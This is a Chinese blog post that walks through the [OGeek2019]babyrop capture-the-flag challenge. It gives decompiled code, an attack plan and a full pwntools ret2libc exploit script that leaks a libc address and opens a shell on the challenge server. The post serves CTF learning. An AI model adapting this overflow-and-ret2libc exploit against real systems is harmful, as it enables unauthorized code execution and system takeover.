ctf【[OGeek2019]babyrop】

于 2022-10-29 12:13:06 发布
阅读量238 收藏
点赞数
分类专栏: CTF-PWN 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huangliang_/article/details/127585428
版权

逆向

int __cdecl main()
{
  int buf; // [esp+4h] [ebp-14h] BYREF
  char v2; // [esp+Bh] [ebp-Dh]
  int fd; // [esp+Ch] [ebp-Ch]

  sub_80486BB();
  fd = open("/dev/urandom", 0);
  if ( fd > 0 )
    read(fd, &buf, 4u);
  v2 = sub_804871F(buf);
  sub_80487D0(v2);
  return 0;
}

int __cdecl sub_804871F(int a1)
{
  size_t v1; // eax
  char s[32]; // [esp+Ch] [ebp-4Ch] BYREF
  char buf[32]; // [esp+2Ch] [ebp-2Ch] BYREF
  ssize_t v5; // [esp+4Ch] [ebp-Ch]

  memset(s, 0, sizeof(s));
  memset(buf, 0, sizeof(buf));
  sprintf(s, "%ld", a1);
  v5 = read(0, buf, 0x20u);
  buf[v5 - 1] = 0;
  v1 = strlen(buf);
  if ( strncmp(buf, s, v1) )
    exit(0);
  write(1, "Correct\n", 8u);
  return (unsigned __int8)buf[7];
}

ssize_t __cdecl sub_80487D0(char a1)
{
  ssize_t result; // eax
  char buf[231]; // [esp+11h] [ebp-E7h] BYREF

  if ( a1 == 127 )
    result = read(0, buf, 0xC8u);
  else
    result = read(0, buf, a1);
  return result;
}

攻击思路

(1)用0x00绕过strncmp比较

(2)进入sub_80487D0函数进行第二次输入,因为buf有0xe7字节,因此0xc8是不够输入的,为使得多输入一些字符可以将a1写为0xff

(3)泄漏read的got地址,求得偏移量,通过溢出执行write函数,打印出read的got地址,并在此之后重新执行sub_80487D0函数

(4)根据得到的read的got地址求偏移量,计算出system函数地址和"\bin\sh"的地址,实施漏洞攻击,夺取权限

脚本攻击

# -*- coding:utf-8 -*-
from pwn import *
from LibcSearcher import *

p=remote("node4.buuoj.cn",29791)
elf=ELF('./pwn')
write_plt=elf.plt['write']
read_got=elf.got['read']
read_plt=elf.plt['read']
main_addr=0x8048825
func_addr=0x80487D0

payload=b'\x00'+b'\xff'*8
p.sendline(payload)
p.recvuntil(b'Correct\n')

payload=b'a'*(0xe7+0x4)+p32(write_plt)+p32(main_addr)+p32(1)+p32(read_got)+p32(0x4)
p.sendline(payload)
read_addr=u32(p.recv(4))
print(hex(read_addr))

payload=b'\x00'+b'\xff'*8
p.sendline(payload)

libc=ELF('./libc-2.23.so')
system_libc=libc.symbols['system']
binsh_libc=libc.search(b'/bin/sh').__next__()
read_libc=libc.symbols['read']

base=read_addr-read_libc
system_addr=system_libc+base
binsh_addr=binsh_libc+base

payload=b'a'*(0xe7+0x4)+p32(system_addr)*2+p32(binsh_addr)
p.sendline(payload)

p.interactive()

ACanary
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
2019领航杯CTF题目
11-25
2019领航杯CTF的原题,文件恢复和DNS两题没有
OGeek2019_babyrop
z1r0的博客
12-04 255
OGeek2019_babyrop 查看保护 取了一个随机数,接着跟进一下804871f 匹配用户输入的是否与随机数相等。这里使用\x00来绕过,返回了一个v5,v5没有给值,我们再接着往下看 这个函数内a1超过0xE7就会溢出过ebp,所以我们让a1为0xff,就可以溢出很长的空间,这里的a1也就是上面的v5,所以我们肯定要控制v5,看一下v5和buf的关系 804871f这个函数内可以让buf输入0x20个字符,v5和buf距离为7,这样我们就可以控制v5了。接下来rop就好了 from pw
[OGeek2019]babyrop
m0sway的博客
03-22 1096
[OGeek2019]babyrop WriteUp BUU_PWN
软件如何画pcb螺丝孔_如何画函数图像(常见函数篇)——动态数学软件GeoGebra...
weixin_33397994的博客
01-13 426
在GeoGebra里,一输入表达式,函数图像瞬间出来。下面,我们来看看常见函数是如何输入的。分类普通函数例:f(x) = sin(2x),g(x) = x² + 2【直接输入“=”右边的式子即可】分别输入sin(2x) , x^2 + 2系数待定的函数【法一】输入表达式,再点“创建滑动条”例:f(x) = k x + b输入k x + b,再“创建滑动条”【法二】先创建滑动条,再输入表达式例:f(...
picoctf_2018_buffer overflow 2&&wustctf2020_getshell&&[BJDCTF 2nd]snake_dyn&&ciscn_2019_es_7[rsop]
、moddemod
07-22 409
picoctf_2018_buffer overflow 2 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_2' p = process(proc_name) p = remote('node3.buuoj.cn', 28375) elf =
D^3CTF 2019 Challenges.zip
08-16
D^3CTF 2019 CTF
CyBRICS CTF Quals 2019 Web 题解1
08-04
CyBRICS CTF Quals 2019 Web 题解一大堆字,直接查看final.html的源码,没什么发现然后把final.html删掉,发现index
CTF-WEB[GXYCTF 2019]BabyUpload
最新发布
02-08
CTF-WEB[GXYCTF 2019]BabyUpload
i-SOON_CTF_2019:2019第二届安洵杯过渡环境
03-09
i-SOON_CTF_2019 2019第二届安洵杯部分过渡环境/源码 收集分类为大型/大型CTF比赛赛题,提供容器化专属翻译环境。 如有争议,或转型问题请电联
BUUCTF--[OGeek2019]babyrop
N1rvana的博客
11-14 3391
才学习了基本的ROP流程,到处找题练,不过也没做出来几道题,以这道32位的题作为例题吧。 这道题是BUUCTF上pwn练习题里的[OGeek2019]babyrop。 代码审计 老规矩先checksec一下: 没有canary保护,nx保护开启排除shellcode可能性,FULL RELEO为地址随机化。 观察主函数,先设定了一个闹铃,到时间就会强制退出程序,解除闹铃的方法在上一篇博客中提到过了, 这道题中闹铃函数依然对我们解题起不到什么干扰作用。 主函数的思路大概是:生成一个随机数,把这个随机数作为
buuctf-[OGeek2019]babyrop
weixin_44864859的博客
04-09 2188
查看主函数 int __cdecl main() { int buf; // [esp+4h] [ebp-14h] char v2; // [esp+Bh] [ebp-Dh] int fd; // [esp+Ch] [ebp-Ch] sub_80486BB(); fd = open("/dev/urandom", 0); if ( fd > 0 ) read...
2020-11-11
weixin_52232741的博客
11-11 162
Python文件操作函数 1.Read()函数 函数说明 Read from stream. 函数语法 read(size=-1, /),返回值为str f.read() #全部读取 f.read(100) #读取100个字符 2.Readline()函数 函数说明 Read from stream until newline or EOF. 函数语法 readline(size=-1, /),返回值为str f.readline() #读取一行数据 3. Write()函数 函数说明 Write
[BUUCTF]PWN7——[OGeek2019]babyrop
mcmuyanga的博客
08-25 1176
[BUUCTF]PWN7——[OGeek2019]babyrop 题目网址:https://buuoj.cn/challenges#[OGeek2019]babyrop 步骤: 例行检查,32位,开启了RELRO(对got表不可以写)和NX(堆栈不可执行) nc的时候没有什么回显,用32位ida打开附件,shift+f12查看程序里的字符串,没有发现system和/bin/sh 从main函数开始看程序 用户输入一个字符串给buf,然后跟随机数比较大小,strncmp里的比较长度的参数v1是我们输入
CTF buuoj pwn-----第8题:[OGeek2019]babyrop
bing_Max的博客
09-27 475
CTF buuoj pwn-----第8题:[OGeek2019]babyrop前言1. checksec2. 解题思路2.1 函数分析2.2 栈帧分析3. 编写EXP4. 运行EXP,获取flag 前言 梳理记录一下这道题的解题过程. 1. checksec bing@bing-virtual-machine:~/pwn$ checksec babyrop [*] '/home/bing/pwn/babyrop' Arch: i386-32-little RELRO: F
[D3CTF 2019]EasyWeb
07-28
综上所述,\[D3CTF 2019\]EasyWeb可能涉及到使用兼容低版本的Smarty引擎、按需加载的类导致pop链难以找到,以及通过绕过过滤条件来获取flag的方法。 #### 引用[.reference_title] - *1* *2* [d3ctf easyweb题解]...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ACanary

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值